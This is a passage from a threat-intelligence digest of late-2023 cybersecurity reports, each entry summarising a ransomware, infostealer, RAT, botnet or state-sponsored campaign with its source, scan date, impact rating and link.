Summary:: BlackBerry's Threat Research team has uncovered a sophisticated cyber-espionage campaign, naming the threat actor AeroBlade, targeting a U.S. aerospace organization. Initiated through spear-phishing, the attacker evolved their tactics from a testing phase in September 2022 to a more advanced stage in July 2023. The attacker's goal, assessed with medium to high confidence, is commercial cyber espionage.

Source: https://blogs.blackberry.com/en/2023/11/aeroblade-on-the-hunt-targeting-us-aerospace-industry

Intel Source:: CISA

Intel Name:: Exploit_of_PLCs_in_US_Water_and_Wastewater_Systems_Facilities

Date of Scan:: 2023-12-05

Impact:: HIGH

Summary:: The FBI, CISA, NSA, EPA, and the Israel National Cyber Directorate released their joined Security Advisory to share about continued malicious cyber activity against operational technology devices by Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated Advanced Persistent Threat cyber actors. The IRGC is an Iranian military organization that the United States designated as a foreign terrorist organization in 2019. IRGC-affiliated cyber actors using the persona “CyberAv3ngers” are actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs).

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a

Intel Source:: Cyberint

Intel Name:: Lumma_Stealer_threat_in_the_expanding_infostealers_Ecosystem

Date of Scan:: 2023-12-05

Impact:: MEDIUM

Summary:: Lumma Stealer, identified in August 2022, continues to evolve as a prominent InfoStealer. Orchestrated by threat actor "Shamel," it targets crypto users, extracting sensitive data through various methods. Priced at $140-$160 per month on the dark web, Lumma Stealer poses a significant risk with potential financial losses, compromised security, and privacy breaches. Its impact extends to organizational reputational damage. Businesses are urged to stay vigilant and implement robust cybersecurity measures against this evolving threat.

Source: https://cyberint.com/blog/research/the-lumma-stealer-infostealer-the-details/

Intel Source:: CADO Security

Intel Name:: P2PInfect

Date of Scan:: 2023-12-05

Impact:: LOW

Summary:: Cado analysts have been monitoring the development of a cross-platform botnet “P2Pinfect”. As the name suggests, the malware – written in Rust – acts as a botnet agent, connecting infected hosts in a peer-to-peer topology.

Source: https://www.cadosecurity.com/p2pinfect-new-variant-targets-mips-devices/

Intel Source:: Cybereason

Intel Name:: Compromise_of_SEO_Poisoning_and_Large_Payloads_by_GootLoader_threat

Date of Scan:: 2023-12-05

Impact:: MEDIUM

Summary:: The Cybereason IR team captured different attack scenarios, which started from a GootLoader infection to ultimately deployed more capabilities. Cybereason IR team observed payloads with large sizes (40MB and more) and masquerading with legitimate JavaScript code to evade security mechanisms, displayed fast-moving behaviors, also observed post-infection frameworks being deployed: Cobalt Strike and SystemBC, which is usually leveraged for data exfiltration, SEO Poisoning techniques used to spread malware.

Source: https://www.cybereason.com/blog/threat-alert-gootloader-seo-poisoning-and-large-payloads-leading-to-compromise

Intel Source:: Cybereason

Intel Name:: DJvu_Variant_Xaro_Delivered_via_Freeware_Loader

Date of Scan:: 2023-12-05

Impact:: LOW

Summary:: The Cybereason Security Services Team is investigating incidents involving a variant of the DJvu ransomware named "Xaro," delivered through loaders masquerading as freeware. This attack aims at data exfiltration, information theft, and file encryption for ransom. Notable observations include the .xaro extension appended to affected files and a "shotgun" infection approach, deploying various malware strains alongside Xaro.

Source: https://www.cybereason.com/blog/threat-alert-djvu-variant-delivered-by-loader-masquerading-as-freeware

Intel Source:: Cyble

Intel Name:: Return_of_the_Banking_Trojan_TrickMo

Date of Scan:: 2023-12-05

Impact:: LOW

Summary:: Cyble researchers discovered a new variant of the banking trojan via VirusTotal Intelligence back in September 2023. This variant of TrickMo demonstrated the advanced functionalities upon comparison with the last analysis, employing overlay injection techniques to extract credentials from targeted applications instead of relying on screen recording, as observed in the first iteration.

Source: https://cyble.com/blog/trickmos-return-banking-trojan-resurgence-with-new-features/

Intel Source:: Trellix

Intel Name:: Unveiling_Akira_Ransomware

Date of Scan:: 2023-12-05

Impact:: MEDIUM

Summary:: Discovered in 2023, the Akira ransomware employs a double extortion scheme, targeting diverse sectors with victims primarily in the United States. Using various initial access methods, including multi-factor authentication exploitation and spear phishing, the ransomware exfiltrates data, encrypts files with ChaCha, and demands payment for decryption and data protection.

Source: https://www.trellix.com/about/newsroom/stories/research/akira-ransomware/

Intel Source:: TrendMicro

Intel Name:: Ransomware_group_Trigona_operation

Date of Scan:: 2023-12-05

Impact:: MEDIUM

Summary:: Trigona threat actors were observed leveraging the vulnerability CVE-2021-40539. Trigona also targets compromised accounts by obtaining access from network access brokers. Based on a combination of Trend’s open-source intelligence (OSINT) research and investigation of the leak site, Trigona ransomware compromised 33 organizations within a short period in North America, Europe, Enterprises in Asia-Pacific and Latin America, and the Caribbean were also compromised.

Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-trigona

Intel Source:: STR

Intel Name:: Threat_Actors_Target_MSSQL_Servers

Date of Scan:: 2023-12-05

Impact:: MEDIUM

Summary:: In an interesting attack campaign, the Securonix Threat Research team has identified threat actors targeting exposed Microsoft SQL (MSSQL) services using brute force attacks. One of the things that makes DB#JAMMER stand out is how the attacker’s tooling infrastructure and payloads are used. The ransomware payload of choice appears to be a newer variant of Mimic ransomware called FreeWorld.

Source: https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/

Intel Source:: Wordfence

Intel Name:: WordPress_Phishing_Campaign_Targets_Users_with_Fake_Security_Patch_Plugin

Date of Scan:: 2023-12-05

Impact:: LOW

Summary:: Wordfence Threat Intelligence Team has identified a phishing campaign targeting WordPress users, falsely warning of a non-existent Remote Code Execution vulnerability (CVE-2023-45124). The phishing email instructs users to download a fake "Patch" plugin, leading to a malicious backdoor. The plugin adds an administrator user (wpsecuritypatch) and communicates with a command and control domain. The separate backdoor provides multiple forms of access, enabling full control over the WordPress site and the server's web user account.

Source: https://www.wordfence.com/blog/2023/12/psa-fake-cve-2023-45124-phishing-scam-tricks-users-into-installing-backdoor-plugin/

Intel Source:: thedfirreport

Intel Name:: BlueSky_Ransomware_Emerges

Date of Scan:: 2023-12-04

Impact:: LOW

Summary:: In December, a notable intrusion occurred, targeting public-facing MSSQL servers, resulting in the deployment of BlueSky ransomware. This report unveils the threat actors' techniques, starting with a MSSQL brute force attack on the "sa" account. Leveraging Cobalt Strike and Tor2Mine, the attackers executed post-exploitation activities. Within an hour, BlueSky ransomware spread network-wide. The report provides a comprehensive breakdown, including threat actor profiles, initial access details, execution events, persistence methods, privilege escalation tactics, and the impact of the ransomware.

Source: https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/

Intel Source:: Cyble

Intel Name:: Uncovering_the_new_Java_Based_SAW_RAT

Date of Scan:: 2023-12-01

Impact:: LOW

Summary:: This article provides an analysis of the Saw RAT, a Java-based RAT embedded in a ZIP archive file. It outlines the infiltration strategy, which involves a maliciously crafted ZIP archive containing a PDF icon shortcut, a JavaScript file, a deceptive PDF file, and a malicious JAR file. The malware establishes a connection with a C&C server and carries out various functions in response to commands. Recommendations for best practices to protect against such attacks are also provided.

Source: https://cyble.com/blog/uncovering-the-new-java-based-saw-rats-infiltration-strategy-via-lnk-files/

Intel Source:: Malwarebytes

Intel Name:: Fake_Virus_Alerts

Date of Scan:: 2023-12-01

Impact:: LOW

Summary:: ScamClub has been running a malvertising campaign since 2018, redirecting mobile users on high profile websites to a fake security alert connected to a malicious McAfee affiliate. The malicious JavaScripts were hosted on Google's cloud but have since moved to Azure's CDN. Malwarebytes for Android can protect users from this campaign. Indicators of compromise are provided.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/11/associated-press-espn-cbs-among-top-sites-serving-fake-virus-alerts

Intel Source:: PaloAlto

Intel Name:: Attacks_against_organizations_in_the_Middle_East_and_Africa

Date of Scan:: 2023-12-01

Impact:: LOW

Summary:: Unit 42 researchers identified a tool set used by a threat actor against Middle East, Africa and the US, including Agent Racoon malware, Ntospy, and a customized version of Mimikatz. The tool set was used to exfiltrate confidential information, such as emails and Roaming Profiles, and was mapped to the MITRE ATT&CK matrix.

Source: https://unit42.paloaltonetworks.com/new-toolset-targets-middle-east-africa-usa/

Intel Source:: Arctic Wolf

Intel Name:: Cactus_Ransomware_Campaign_Exploiting_Vulnerabilities_in_Qlik_Sense

Date of Scan:: 2023-12-01

Impact:: MEDIUM

Summary:: Researchers from Arctic Wolf Labs have observed a new catus ransomware compaign exploiting the publicly-exposed installations of Qlik Sense. This campaign marks the first documented instance, which is aware that where threat actors are deploying Cactus ransomware and exploiting vulnerabilities in Qlik Sense for initial access.

Source: https://www.arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/

Intel Source:: Infoblox

Intel Name:: Early_Detection_of_ROMCOM_malicious_DNS

Date of Scan:: 2023-12-01

Impact:: LOW

Summary:: This article discusses the malicious domain ROMCOM and the threat actor group Void Rabisu, and how Infoblox's DNS Early Detection Program identified multiple ROMCOM malicious domains as suspicious an average of 91.6 days before they were identified as malicious in OSINT. It also explains how ROMCOMLITE, a new variation of the malware, is being used to target organizations in Ukraine and various NATO countries, and how Infoblox's suspicious domain data can help customers reduce risk and increase the return on investment for their threat intelligence program.

Source: https://blogs.infoblox.com/cyber-threat-intelligence/dns-early-detection-romcom/

Intel Source:: Cisco Talos

Intel Name:: South_Korea_and_Uzbekistan_are_Targeted_by_SugarGh0st_RAT

Date of Scan:: 2023-12-01

Impact:: LOW

Summary:: Cisco Talos researchers have identified a new RAT, "SugarGh0st," in a malicious campaign. They assess with high confidence that the SugarGh0st RAT is a new customized variant of Gh0st RAT, an infamous trojan that’s been active for more than a decade, with customized commands to facilitate the remote administration tasks as directed by the C2. They observed two infection chains leveraging Windows Shortcut embedded with malicious JavaScript to deliver the components to drop and launch the SugarGh0st payload.

Source: https://blog.talosintelligence.com/new-sugargh0st-rat/

Intel Source:: ASEC

Intel Name:: Malware_Distributing_Using_Sale_of_Personal_Information_as_Bait

Date of Scan:: 2023-11-30

Impact:: LOW

Summary:: Researchers from ASEC have uncovered a case of virus spreading that used the selling of personal data as a lure. This attack case uses a hacking method known as social engineering.

Source: https://asec.ahnlab.com/en/59379/

Intel Source:: ASEC

Intel Name:: South_Korean_Research_Institutes_Targeted_by_Kimsuky

Date of Scan:: 2023-11-30

Impact:: LOW

Summary:: ASEC researchers have discovered that the Kimsuky threat organization is sending malicious JSE files to South Korean research institutes under the appearance of an import declaration. In the end, the threat actor employs a backdoor to carry out commands and steal data.

Source: https://asec.ahnlab.com/en/59387/

Intel Source:: Cyfirma

Intel Name:: The_release_of_new_malware_Nova_infostealer

Date of Scan:: 2023-11-30

Impact:: LOW

Summary:: MaaS operator Sordeal has developed the Nova infostealer, a sophisticated malware with alarming capabilities such as credential harvesting, Discord injection, and targeting crypto wallets. Organizations must enhance their threat detection and fortify defenses to mitigate the risks posed by Nova. Strategic, tactical, and management recommendations are provided to help protect against the malware.

Source: https://www.cyfirma.com/outofband/emerging-maas-operator-sordeal-releases-nova-infostealer/

Intel Source:: Huntress

Intel Name:: Observed_the_use_of_Finger_a_client_server_application

Date of Scan:: 2023-11-30

Impact:: LOW

Summary:: Huntress analysts observed the use of Finger, a client-server application, to exfiltrate data from an endpoint. The threat actor created a webshell on an MSExchange server and used Finger to download a file and gain situational awareness. In September 2020, an advisory was published by security researcher John Page. MITRE ATT&CK mappings and a statistic from Huntress' SMB Threat Report are also provided.

Source: https://www.huntress.com/blog/cant-touch-this-data-exfiltration-via-finger

Intel Source:: cybereason

Intel Name:: Delivering_DJvu_Variant_while_Posing_as_Freeware_via_Loader

Date of Scan:: 2023-11-29

Impact:: MEDIUM

Summary:: Researchers from Cybereason have seen DJvu variants distributing through loaders that appear to be freeware. They present an overview of these dangers and offer doable suggestions for defending against them.

Source: https://www.cybereason.com/hubfs/dam/collateral/reports/threat-alert-DJvu-variant.pdf

Intel Source:: Censys

Intel Name:: Tracking_Vidar_malware_infrastructure

Date of Scan:: 2023-11-29

Impact:: LOW

Summary:: The security researcher shared his details about one of the more advanced stealers: Vidar. Vidar is a piece of malware originating from the Arkei Stealer but uses new methods to find and direct traffic to the attacker.

Source: https://censys.com/tracking-vidar-infrastructure/

Intel Source:: Russian Panda

Intel Name:: MetaStealer_analysis

Date of Scan:: 2023-11-29

Impact:: LOW

Summary:: Russian Panda researchers provided the technical analysis and overview of Red Stealer's some functionalities. It had so many similarities with Redline Stealer.

Source: https://russianpanda.com/2023/11/20/MetaStealer-Redline%27s-Doppelganger/

Intel Source:: Weixin

Intel Name:: The_delivery_of_the_Remcos_Trojan

Date of Scan:: 2023-11-29

Impact:: LOW

Summary:: The QiAnXin Threat Intelligence Center observed that Spyder has undergone at least two rounds of updates since July, and found that attackers used Spyder to implant the Remcos Trojan into the target host. The Spyder malware is associated with the Maharashtra organization, and its main function is to download and run executable files issued by the C2 server.

Source: https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&mid=2247508856&idx=1&sn=256ab2e8e63a406a37088f1b133eb6ff&chksm=ea66540fdd11dd1924c87240bbf3675e276a17a5980df63d8aace47c92cbe40ca5e197f7e183&scene=178&cur_album_id=1539799351089283075#rd

Intel Source:: Fortinet

Intel Name:: GoTitan_Botnet_Exploiting_Apache_ActiveMQ_Vulnerability

Date of Scan:: 2023-11-29

Impact:: LOW

Summary:: Threat actors are aggressively using the recently discovered severe security weakness affecting Apache ActiveMQ to spread a new Go-based botnet named GoTitan and a.NET application called PrCtrl Rat, which has the ability to remotely takeover the compromised servers.

Source: https://www.fortinet.com/blog/threat-research/gotitan-botnet-exploitation-on-apache-activemq

Intel Source:: Cyble

Intel Name:: New_Persian_Remote_World_malicious_activity

Date of Scan:: 2023-11-28

Impact:: LOW

Summary:: Cyble research center identified a website selling malicious tools, including RATs, loaders, and crypters, which can enable unauthorized control, identity theft, financial fraud, and system modifications. Recommendations to protect against these tools are provided, as well as MITRE ATT&CK® Techniques and Indicators of Compromise (IOCs).

Source: https://cyble.com/blog/new-persian-remote-world-selling-a-suite-of-malicious-tools/

Intel Source:: Malware Traffic Analysis

Intel Name:: AgentTesla_infection_with_FTP_data_exfil

Date of Scan:: 2023-11-28

Impact:: LOW

Summary:: This article provides an overview of an AgentTesla infection with FTP data exfiltration that occurred on 2023-11-22. It includes associated files, malware/artifacts, email headers, and infection chain. Malware/artifacts include a RAR archive, VBS file, script, PNG image, DLL, reversed base64 text, and AgentTesla EXE. Infection traffic is also listed, including IP addresses and ports used.

Source: https://www.malware-traffic-analysis.net/2023/11/22/index.html

Intel Source:: Virustotal Blog

Intel Name:: Actionable_day_in_a_Threat_Hunters_life_report

Date of Scan:: 2023-11-28

Impact:: LOW

Summary:: This article explains how to use VirusTotal Intelligence (VTI) to hunt and monitor malicious activity, using third-party intelligence reports. It provides examples of how to use VTI to search for samples with similar behaviors, and how to convert VTI queries into YARA rules for use in VirusTotal Livehunt.

Source: https://blog.virustotal.com/2023/11/actionable-threat-intel-vi-day-in.html

Intel Source:: Welivesecurity

Intel Name:: Insight_into_groups_operating_Telekopye_bots

Date of Scan:: 2023-11-28

Impact:: LOW

Summary:: Welivesecurity published their article about Telekopye, a Telegram bot that helps cybercriminals scam people in online marketplaces. Telekopye can craft phishing websites, emails, SMS messages, and more.

Source: https://www.welivesecurity.com/en/eset-research/telekopye-hunting-mammoths-using-telegram-bot/

Intel Source:: PaloAlto

Intel Name:: The_2_state_sponcored_North_Korean_campaigns_targeting_job_seekers

Date of Scan:: 2023-11-28

Impact:: MEDIUM

Summary:: The team at Palo Alto Networks Unit 42 released some great research of North Korean activity leveraging remote work in two unique campaigns they call Contagious Interview and Wagemole. Both campaigns have the goals of espionage and cryptocurrency theft.

Source: https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/#post-131292-_6n6fflyzyu52

Intel Source:: Any.run

Intel Name:: Diving_Deep_into_RisePro_Malware

Date of Scan:: 2023-11-28

Impact:: LOW

Summary:: AnyRun researchers have examined the RisePro malware. The spyware, which steals information, was initially discovered by cybersecurity companies Sekoia and Flashpoint. It is disseminated via fake crack websites run by the pay-per-install (PPI) malware distribution firm PrivateLoader. Its goal is to take cryptocurrency wallets, passwords, and credit cards from compromised machines.

Source: https://any.run/cybersecurity-blog/risepro-malware-communication-analysis/

Intel Source:: Sentilone

Intel Name:: DPRK_Crypto_Theft

Date of Scan:: 2023-11-27

Impact:: MEDIUM

Summary:: This article discusses two North Korean-aligned macOS campaigns in 2023: RustBucket and KandyKorn. RustBucket used a Swift-based application bundle and KandyKorn used a five-stage attack with social engineering via Discord. KandyKorn is distributed as Cross-Platform Bridges.zip and contains multiple benign Python scripts. SentinelOne Singularity detects and protects against all known components of KandyKorn and RustBucket malware.

Source: https://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/

Intel Source:: Qualys

Intel Name:: Phobos_Ransomware_Masquerading_As_VX_Underground

Date of Scan:: 2023-11-27

Impact:: LOW

Summary:: Phobos ransomware is a malicious software masquerading as VX-Underground, distributed via stolen RDP connections. It halts execution if Cyrillic alphabets are present, kills processes, deletes shadow copies, and encrypts files with a ".VXUG" extension. Qualys Threat Research is monitoring the attack and providing hunting queries for detection.

Source: https://blog.qualys.com/vulnerabilities-threat-research/2023/11/23/unveiling-the-deceptive-dance-phobos-ransomware-masquerading-as-vx-underground

Intel Source:: NIS

Intel Name:: Hackers_Utilize_Supply_Chain_Attacks_With_Zero_Day_Vulnerabilities

Date of Scan:: 2023-11-27

Impact:: MEDIUM

Summary:: The National Intelligence Service (NIS) of Korea and the National Cyber Security Centre (NCSC) have issued a warning over the North Korean Lazarus hacker group's use of a zero-day vulnerability in the MagicLine4NX software to perform supply-chain assaults against businesses.

Source: https://www.documentcloud.org/documents/24174869-rok-uk-joint-cyber-security-advisoryeng

Intel Source:: ASEC

Intel Name:: Exploiting_an_Apache_ActiveMQ_Vulnerability_CVE_2023_46604

Date of Scan:: 2023-11-27

Impact:: MEDIUM

Summary:: The Andariel threat group has been targeting South Korean companies and institutions with spear phishing, watering hole, and supply chain attacks. Recently, they have been exploiting a Log4Shell vulnerability, targeting MS-SQL servers, and abusing legitimate software. AhnLab Security Emergency Response Center (ASEC) discovered the group exploiting a remote code execution vulnerability (CVE-2023-46604) in Apache ActiveMQ servers to install malware, including NukeSped, HelloKitty ransomware, Metasploit Meterpreter's Stager, and CobaltStrike Beacon. The article provides hashes, C&C servers, and URLs associated with the malicious files.

Source: https://asec.ahnlab.com/en/59318/

Intel Source:: Esentire

Intel Name:: Parallax_RAT_infection

Date of Scan:: 2023-11-27

Impact:: LOW

Summary:: Parallax RAT is a malware discovered by eSentire's TRU. It is delivered to machines, has capabilities to evade detection, and can be used to compromise endpoints. Recommendations are provided to protect against it, as well as indicators of compromise.

Source: https://www.esentire.com/blog/unveiling-parallax-rat-a-journey-from-infection-to-lateral-movement

Intel Source:: Checkpoint

Intel Name:: Taking_Edge_Off_Systemjoker_in_Israel_Hamas_War_Spotlight

Date of Scan:: 2023-11-24

Impact:: MEDIUM

Summary:: Researchers at Check Point have traced the development of SysJoker, a previously unidentified multi-platform backdoor that was used by an APT with ties to Hamas to target Israel.

Source: https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/

Intel Source:: Malwarebytes

Intel Name:: Distributing_Atomic_Stealers_via_Fake_Browser_Updates

Date of Scan:: 2023-11-24

Impact:: LOW

Summary:: Researchers at Malwarebytes have discovered that AMOS is being distributed to Mac users through a fake browser update chain known as "ClearFake." This might be the first time that one of the most popular social engineering campaigns which was previously exclusive to Windows branches out into other operating systems in addition to geolocation.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/11/atomic-stealer-distributed-to-mac-users-via-fake-browser-updates

Intel Source:: IBM Security Intelligence

Intel Name:: Missuse_of_MQTT_Messaging_Protocol_by_Stealthy_WailingCrab_Malware

Date of Scan:: 2023-11-24

Impact:: LOW

Summary:: Researchers from IBM X-Force have been monitoring changes made to the WailingCrab malware family. They have focused on changes that affect the virus's C2 communication techniques, which involve abusing the MQTT Internet-of-Things (IoT) messaging protocol.

Source: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/

Intel Source:: SOC Radar

Intel Name:: An_Overview_of_Volt_Typhoon

Date of Scan:: 2023-11-24

Impact:: LOW

Summary:: Volt Typhoon, also known as BRONZE SILHOUETTE, is an advanced, state-sponsored Advanced Persistent Threat (APT) organization that is mostly thought to have originated in China. Their online activities have been meticulously observed and recorded over the last few years by numerous cybersecurity companies, international intelligence agencies, and governmental organizations.

Source: https://socradar.io/apt-profile-volt-typhoon/

Intel Source:: Fortinet

Intel Name:: Konni_Campaign_Spreading_Through_a_Malicious_File

Date of Scan:: 2023-11-24

Impact:: LOW

Summary:: The Russian-language Word document that has a malicious macro included in it is being used in the ongoing Konni campaign, according to FortiGuard Labs. Internal telemetry shows continued engagement on the campaign's C2 server even though the document was created in September.

Source: https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document

Intel Source:: Akamai

Intel Name:: Marai_Based_Botnet_Explores_Two_Zero_Days

Date of Scan:: 2023-11-23

Impact:: LOW

Summary:: Researchers from Akamai have uncovered a brand-new DDoS botnet, called InfectedSlurs, that targets routers and network video recorders (NVRs) by actively taking advantage of two zero-day vulnerabilities.

Source: https://www.akamai.com/blog/security-research/new-rce-botnet-spreads-mirai-via-zero-days

Intel Source:: ReliaQuest

Intel Name:: Scattered_Spider_Attack_Analysis

Date of Scan:: 2023-11-23

Impact:: LOW

Summary:: ReliaQuest recently observed an intrusion to a customer’s internal IT documentation, and a lateral access move from the customer’s identity-as-a-service (IDaaS) provider to their on-premises assets in reallu short time minutes. It was detected that it was the highly capable “Scattered Spider” cybercrime group perpetrated the attack. Scattered Spider, an “ALPHV”/“BlackCat” ransomware affiliate, infiltrates cloud and on-premises environments via social engineering.

Source: https://www.reliaquest.com/blog/scattered-spider-attack-analysis-account-compromise/

Intel Source:: Malware news

Intel Name:: The_distribution_of_Atomic_Stealer_to_Mac_users

Date of Scan:: 2023-11-23

Impact:: LOW

Summary:: Atomic Stealer, aka AMOS, is an known stealer for Mac OS. Reently it was observed a new development, AMOS is now being delivered to Mac users via a fake browser update chain tracked as ‘ClearFake’. It is the first time it was observed this main social engineering campaigns, previously reserved for Windows. The threat actors could widden their new possibilities by stealing credentials and files of interest that can be monetized immediately or repurposed for additional attacks.

Source: https://malware.news/t/atomic-stealer-distributed-to-mac-users-via-fake-browser-updates/75907

Intel Source:: TrendMicro

Intel Name:: Possible_Return_of_Genesis_Market_malicious_operations

Date of Scan:: 2023-11-23

Impact:: LOW

Summary:: The Trend Micro Managed XDR team observed malicious campaigns that was very similar to the ones used by Genesis Market. The threat actor used Node.js to act as a platform for the backdoor, Extended Validation (EV) Code Signing for defense evasion, and possibly Google Colab to host search engine-optimized download sites. The Trend Micro researchers provided in their blog a technical analysis of these attacks, including the confirmation and speculations on the other techniques used by the threat actor behind these activities.

Source: https://www.trendmicro.com/en_us/research/23/k/attack-signals-possible-return-of-genesis-market.html

Intel Source:: Microsoft

Intel Name:: Modified_CyberLink_Installer_Distributing_by_Diamond_Sleet

Date of Scan:: 2023-11-23

Impact:: MEDIUM

Summary:: Microsoft researchers have discovered a supply chain attack using a malicious version of an application created by CyberLink Corp. that was carried out by the North Korea-based threat actor Diamond Sleet (ZINC). This malicious file is actually an installer for a CyberLink application, but it has been altered to contain malicious code that loads a second-stage payload and downloads and decrypts it.

Source: https://www.microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/

Intel Source:: Trend Micro

Intel Name:: Malicious_Chrome_Extensions_Targeting_Brazil

Date of Scan:: 2023-11-23

Impact:: LOW

Summary:: Researchers from Trend Micro have described the modular architecture of malicious Chrome extensions, which are made up of a number of highly obfuscated parts that use the Google Chrome API to monitor, intercept, and steal victim data.

Source: https://www.trendmicro.com/en_us/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html

Intel Source:: Securelist

Intel Name:: HrServ_web_shell_analysis

Date of Scan:: 2023-11-23

Impact:: LOW

Summary:: Securelist got a DLL file, that was identified as hrserv.dll, and was previously unknown web shell exhibiting sophisticated features such as custom encoding methods for client communication and in-memory execution.

Source: https://securelist.com/hrserv-apt-web-shell/111119/

Intel Source:: Checkpoint

Intel Name:: A_Comparative_Analysis_of_Ransomware_Attacks_on_Windows_and_Linux

Date of Scan:: 2023-11-22

Impact:: LOW

Summary:: An analysis of a number of the most recent attacks involving ransomware that have been targeting Linux and ESXi systems, which have been increasingly targeted in recent years, has been made available by Check Point Researchers. Though these are still comparatively rudimentary versions that target Linux, they have long been aware of comparable ransomware threats in Windows setups.

Source: https://research.checkpoint.com/2023/the-platform-matters-a-comparative-study-on-linux-and-windows-ransomware-attacks/

Intel Source:: Seebug

Intel Name:: Examination_of_Confluence_Server_Ransomware_Attack_with_C3RB3R

Date of Scan:: 2023-11-22

Impact:: LOW

Summary:: According to a security team, vulnerabilities in the Atlassian Confluence Datacenter and Server software have been found recently. Attackers have used this vulnerability time and time again to target Linux and Windows systems with fresh variants of the C3RB3R (Cerber) ransomware.

Source: https://paper.seebug.org/3076/

Intel Source:: Trellix

Intel Name:: The_DarkGate_Malware_as_a_Service_continuation

Date of Scan:: 2023-11-22

Impact:: LOW

Summary:: The Trellix researchers analyzed developed DarkGate malware versions 4.6, 4.10.2, 4.17b, and the latest 5.0.19, mapping the rapid evolution of the malware. DarkGate is a complete toolkit that provides attackers with extensive capabilities to fully compromise victim systems.

Source: https://www.trellix.com/about/newsroom/stories/research/the-continued-evolution-of-the-darkgate-malware-as-a-service/

Intel Source:: ASEC

Intel Name:: Distribution_of_Malicious_LNK_File

Date of Scan:: 2023-11-22

Impact:: LOW

Summary:: Recently, ASEC has observed a malicious LNK file being distributed to financial and blockchain corporation personnel through email and other ways.

Source: https://asec.ahnlab.com/en/59057/

Intel Source:: Cyble

Intel Name:: New_Java_Based_Rude_Stealer

Date of Scan:: 2023-11-22

Impact:: LOW

Summary:: Cyble researchers observed a new stealer named “Rude”. This Java-based malware is specifically made up for pilfer confidential data from compromised machines discreetly.

Source: https://cyble.com/blog/new-java-based-rude-stealer-abuses-directx-diagnostic-tool/

Intel Source:: Any.Run

Intel Name:: XWorm_Malware_campaign

Date of Scan:: 2023-11-22

Impact:: LOW

Summary:: The analyst from Tweater shared on Any.Run blog about his explore and understand the dynamics occurring when a successful connection is established between the XWorm operating server and a user who has fallen victim to executing this malware.

Source: https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/

Intel Source:: Palo Alto

Intel Name:: A_North_Korean_Group_is_Behind_Two_Job_Related_Campaigns

Date of Scan:: 2023-11-22

Impact:: LOW

Summary:: Researchers from Unit 42 have uncovered two distinct campaigns that target job-seeking activities connected to threat actors with state sponsorship that are connected to the Democratic People's Republic of Korea (DPRK), also referred to as North Korea.

Source: https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/

Intel Source:: NCC Group

Intel Name:: Analysis_of_NoEscape_Ransomware_Group

Date of Scan:: 2023-11-22

Impact:: LOW

Summary:: NoEscape seems to focus on weak external services; the first way in was via taking advantage of a Microsoft Exchange server that was exposed to the public within the victim's network. Webshells were built on the server as a result of exploitation, which also provided the threat actor with an early footing in the environment.

Source: https://research.nccgroup.com/2023/11/20/is-this-the-real-life-is-this-just-fantasy-caught-in-a-landslide-noescape-from-ncc-group/

Intel Source:: VMware

Intel Name:: NetSupport_RAT

Date of Scan:: 2023-11-22

Impact:: LOW

Summary:: Threat analysts from CarbonBlack and VMWare observed more than 15 new infections linked to NetSupport RAT last couple weeks. It was observed that the most of it were from the Education, Government, and Business Services sectors. VMWare analysts described in their report about their methods of detecting and preventing this malware, along with providing valuable insights and resources for defenders. In these latest attacks, the NetSupport RAT has been observed to be downloaded onto a victim’s computer via deceptive websites and fake browser updates. Initial infection, however, can vary depending on the threat actors.

Source: https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html

Intel Source:: PaloAlto

Intel Name:: Stately_Taurus_campaigns

Date of Scan:: 2023-11-21

Impact:: LOW

Summary:: Unit 42 researchers discovered three Stately Taurus attacks during the month of August. These attacks are targeting entities in the South Pacific including the Philippines government. The campaigns manipulated legitimate software including Solid PDF Creator and SmadavProtect (an Indonesian-based antivirus solution) to sideload malicious files.Stately Taurus (aka Mustang Panda, Bronze President, Red Delta, Luminous Moth, Earth Preta and Camaro Dragon) has been operating since at least 2012. It is assessed to be a Chinese advanced persistent threat (APT) group that routinely conducts cyberespionage campaigns

Source: https://unit42.paloaltonetworks.com/stately-taurus-targets-philippines-government-cyberespionage/

Intel Source:: ASEC

Intel Name:: The_Andariel_group_distributing_malware

Date of Scan:: 2023-11-21

Impact:: LOW

Summary:: The ASEC analysts observed the presense of the Andariel group spreading malware via an attack using a certain asset management program. The Andariel group is known to be linked to a sub organization of the Lazarus group.

Source: https://asec.ahnlab.com/en/59073/

Intel Source:: Uptycs

Intel Name:: WinRAR_0_day_CVE_2023_38831_Vulnerability

Date of Scan:: 2023-11-21

Impact:: MEDIUM

Summary:: Recently, it has been discovered that the WinRAR vulnerability, tracked as CVE-2023-38831, has compromised its handling of file extensions, giving opportunities for unauthorized code execution. Uptycs Threat Research Team has outlined the WinRAR vulnerability in a previous blog, detailing its exploitation and providing technical insights.

Source: https://www.uptycs.com/blog/cve-2023-38831-winrar-zero-day

Intel Source:: cybereason

Intel Name:: INC_Ransom_Group_Targets_Western_Organizations_with_Double_Extortion

Date of Scan:: 2023-11-21

Impact:: LOW

